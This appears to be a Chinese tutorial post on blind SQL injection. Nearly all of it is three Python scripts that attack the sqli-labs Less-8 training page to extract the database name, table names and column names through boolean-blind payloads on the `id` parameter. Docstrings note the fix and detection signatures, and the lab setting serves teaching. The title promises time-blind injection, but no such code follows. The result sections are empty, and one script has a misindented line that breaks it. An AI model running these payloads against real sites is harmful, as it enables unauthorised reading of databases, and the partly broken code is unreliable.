boolean盲注和时间盲注

获取当前数据库名 

import requests
 
 
def inject_database(url: str) -> None:
    """Recover the current database name through a boolean-blind SQL injection oracle.

    Targets the sqli-labs exercise this page is about: the `id` query parameter
    is concatenated into the SQL statement, and the page contains the text
    'You are in' only when the injected condition is true. Each request thus
    leaks one comparison result, and a binary search over the ASCII range
    recovers the name one character at a time. Nothing is returned; progress
    is printed.

    Why the oracle exists, and the fix: the server builds SQL from the raw
    `id` value and renders different content depending on the query outcome.
    Parameterized queries remove the injection; a uniform response regardless
    of the query result removes the side channel. For detection, every request
    carries the literal `ASCII(SUBSTRING(DATABASE()` in the `id` parameter.

    Args:
        url: Base URL of the vulnerable page; `id` is sent as a query parameter.
    """
    name=''
    max_length=20  # upper bound on characters probed; longer names are truncated
    
    # Unused: neither mapping is referenced below.
    low={'a': 97, 'z': 122, 'A': 65, 'Z': 90, '0': 48, '9': 57, '_': 95}
    high={97: 'a', 122: 'z', 65: 'A', 90: 'Z', 48: '0', 57: '9', 95: '_'}
 
    for i in range(1, max_length + 1):
        # Search bounds over printable ASCII: space (32) .. 'z' (122).
        low_val=32
        high_val=122
 
        # Lower-bound binary search: converges to the smallest v for which
        # "ASCII > v" is false, i.e. the character code itself.
        while low_val < high_val:
            middle_val=(low_val + high_val) // 2
            payload=f"1' AND ASCII(SUBSTRING(DATABASE(),{i},1))>{middle_val}-- "
            params={"id": payload}
            r=requests.get(url, params=params)
 
            # The page text is the one-bit oracle.
            if 'You are in' in r.text:
                low_val=middle_val + 1
            else:
                high_val=middle_val
 
        # Past the end of the name SUBSTRING yields '' (ASCII 0), every
        # comparison is false and the search bottoms out at 32, so this guard
        # stops appending; a genuine space character would be dropped too.
        if low_val > 32:
            char=chr(low_val)
            name+=char
            print(f"Current database name: {name}")
  
        # Redundant: both bounds are reset at the top of the loop anyway.
        low_val=32
        high_val=122
 
    print(f"Final database name: {name}")
 
 
if __name__ == "__main__":
    # Host name suggests a local sqli-labs training instance (lesson 8);
    # the port is the author's own setup.
    url="http://sqli-labs:8013/Less-8/"
    inject_database(url)

结果

获取数据库表 

import requests
 
 
def inject_table_names(url: str, database_name: str) -> None:
    """Enumerate table names of `database_name` through the same boolean-blind oracle.

    Walks information_schema.tables one row at a time (LIMIT offset) and
    recovers each name character by character with a binary search over
    `allowed_chars`, using the presence of 'You are in' in the response as the
    truth signal. Stops after 5 non-empty names or 100 rows, whichever comes
    first. Results are printed, not returned.

    Defender's view: the query that embeds `id` verbatim is the root cause
    (parameterized queries fix it); read access to information_schema from the
    web application's database account is what makes schema enumeration
    possible, so least-privilege grants limit the blast radius. Every request
    carries the literal `information_schema.tables` inside the `id` parameter,
    which is a straightforward log/WAF signature.

    Args:
        url: Base URL of the vulnerable page.
        database_name: Schema to enumerate; interpolated verbatim into the query.
    """
    table_names=[]
    max_length=20  # characters probed per name
 
    allowed_chars=list(range(48, 58)) + list(range(65, 91)) + list(range(97, 123)) + [95]  # 0-9, A-Z, a-z, _
 
    num_tables=100  # upper bound on LIMIT offsets tried
    for table_index in range(num_tables):
        table_name=''
        for i in range(1, max_length + 1):
            # Search bounds span the allowed alphabet (48 .. 122).
            low=min(allowed_chars)
            high=max(allowed_chars)
            middle=(low + high) // 2
 
            # Lower-bound binary search; after the loop low == high == middle.
            while low < high:
                payload=f"1' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='{database_name}' LIMIT {table_index},1),{i},1))>{middle}-- "
                params={"id": payload}
                # NOTE(review): the next line is indented one column deeper
                # than this one in the pasted source.
                r=requests.get(url, params=params)
                 if 'You are in' in r.text:
                    low=middle + 1
                else:
                    high=middle
                middle=(low + high) // 2
 
            # When SUBSTRING runs past the end of the name, ASCII('') is 0 and
            # every comparison is false, so the search bottoms out at
            # min(allowed_chars) == 48 ('0'), which passes this membership
            # test: names shorter than max_length come out right-padded with '0'.
            if middle in allowed_chars:
                table_name+=chr(middle)
 
            print(f"Current table name: {table_name}")
 
            # Redundant: the bounds are recomputed at the top of the loop.
            low=min(allowed_chars)
            high=max(allowed_chars)
            middle=(low + high) // 2
 
        if table_name:
            table_names.append(table_name)
 
        # Stop after five names regardless of how many rows remain.
        if len(table_names) >= 5:
            break
 
    print(f"Final table names: {table_names}")
 
 
if __name__ == "__main__":
    # Host name suggests a local sqli-labs training instance (lesson 8).
    url="http://sqli-labs:8013/Less-8/"
    database_name="security"  # target database name
    inject_table_names(url, database_name)

结果

 

获取表的列 

import requests
 
 
def inject_column_names(url: str, database_name: str, table_name: str) -> None:
    """Enumerate column names of `table_name` through the boolean-blind oracle.

    Same structure as the table enumeration: information_schema.columns is
    read one row per LIMIT offset, each name is recovered with a binary search
    over `allowed_chars`, and 'You are in' in the response body is the truth
    signal. Stops after 5 accepted names or 100 rows. Results are printed, not
    returned.

    Defender's view: parameterized queries close the injection, a uniform
    response closes the oracle, and restricting the application account's
    access to information_schema limits what can be enumerated. Every request
    carries the literal `information_schema.columns` inside the `id` parameter.

    Args:
        url: Base URL of the vulnerable page.
        database_name: Schema of the table; interpolated verbatim into the query.
        table_name: Table whose columns are enumerated; interpolated verbatim.
    """
    column_names=[]  
    max_length=20  # characters probed per name
 
    allowed_chars=list(range(48, 58)) + list(range(65, 91)) + list(range(97, 123)) + [95]  # 0-9, A-Z, a-z, _
 
    num_columns=100   # upper bound on LIMIT offsets tried
 
    for column_index in range(num_columns):
        column_name=''
        for i in range(1, max_length + 1):
            # Search bounds span the allowed alphabet (48 .. 122).
            low=min(allowed_chars) 
            high=max(allowed_chars) 
            middle=(low + high) // 2
 
            # Lower-bound binary search; after the loop low == high == middle.
            while low < high:
                payload=f"1' AND ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_schema='{database_name}' AND table_name='{table_name}' LIMIT {column_index},1),{i},1))>{middle}-- "
                params={"id": payload}
                r=requests.get(url, params=params)
 
                if 'You are in' in r.text:
                    low=middle + 1
                else:
                    high=middle
                middle=(low + high) // 2
 
            # Past the end of the name ASCII('') is 0, every comparison is
            # false and the search bottoms out at 48 ('0'), which is in
            # allowed_chars: shorter names are right-padded with '0'.
            if middle in allowed_chars:
                column_name+=chr(middle)
 
            print(f"Current column name: {column_name}")
 
            # Redundant: the bounds are recomputed at the top of the loop.
            low=min(allowed_chars)
            high=max(allowed_chars)
            middle=(low + high) // 2
 
        # Presumably a workaround for the '0' padding above: a LIMIT offset
        # past the last column yields a name made entirely of padding, which
        # starts with '0' and is discarded here. A genuine column name that
        # begins with '0' would be discarded as well.
        if column_name and not column_name.startswith("0"):
            column_names.append(column_name)
 
        # Stop after five names regardless of how many rows remain.
        if len(column_names) >= 5:
            break
 
    print(f"Final column names: {column_names}")
 
 
if __name__ == "__main__":
    # Host name suggests a local sqli-labs training instance (lesson 8).
    url="http://sqli-labs:8013/Less-8/"
    database_name="security"  # schema whose table is enumerated
    table_name="users"  # table whose columns are enumerated
    inject_column_names(url, database_name, table_name)

结果
